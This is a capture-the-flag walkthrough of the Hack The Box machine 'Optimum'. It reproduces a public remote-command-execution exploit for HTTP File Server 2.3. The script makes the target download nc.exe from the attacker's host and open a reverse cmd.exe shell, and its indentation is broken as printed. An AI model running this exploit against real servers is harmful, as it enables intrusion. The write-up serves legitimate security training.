Hack The Box – Optimum Walkthrough
Introduction
This was an easy Windows box that involved exploiting a remote command execution vulnerability in the Rejetto HTTP File Server web application to gain an initial foothold and exploiting an overflow vulnerability in a version of Windows 8.1 (MS16-098) to escalate to system.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
Enumerating Port HTTP
When navigating to the web server, it seems to be using HTTP Fileserver 2.3
HTTP File Server is used to send and receive files through a web application. Using searchsploit to look for known exploits in this version of HTTP File Server:
Exploiting Remote Command Execution in HFS 2.3
After trying a few of the exploits available, finally found 39161.py which worked. This vulnerability allows to execute arbitrary commands when performing a search.
The script requires a Netcat binary to be hosted on a web server on port 80, it will create a script that connects to the webserver and downloads it (script_create function), run the script (execute_script
function) and connect to a reverse shell using Netcat.
import urllib2
import sys
try:
def script_create():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
def execute_script():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
def nc_run():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
script_create()
execute_script()
nc_run()
except:
print """[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script"""
Copying Netcat binary to the current directory
Setting up a Python web server to host the Netcat executable
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
When executing the script providing the IP address of the victim host, a reverse shell is granted:
Privilege Escalation
Using the systeminfo windows command to gather information about the Operating System and build/kernel.
Saving the output of the command to a text file to perform enumeration:
Running Windows Exploit Suggester to find known vulnerabilities:
Found a valid exploit for MS16-098 which exploits an integer overflow affecting the ‘RGNOBJ’ variable:
Downloading the executable file from the link in the Exploit DB page
Transferring the binary to the victim host using the Certutil tool:
After executing the exploits, this grants SYSTEM level access to the box:
Conclusion
This was a really easy box, but still interesting nonetheless. I had come across the HTTP File Server web application in previous challenges so this wasn’t new to me but it was a good change to do some research on the privilege escalation vector and how this was exploited.
More information about this exploit can be found at this article.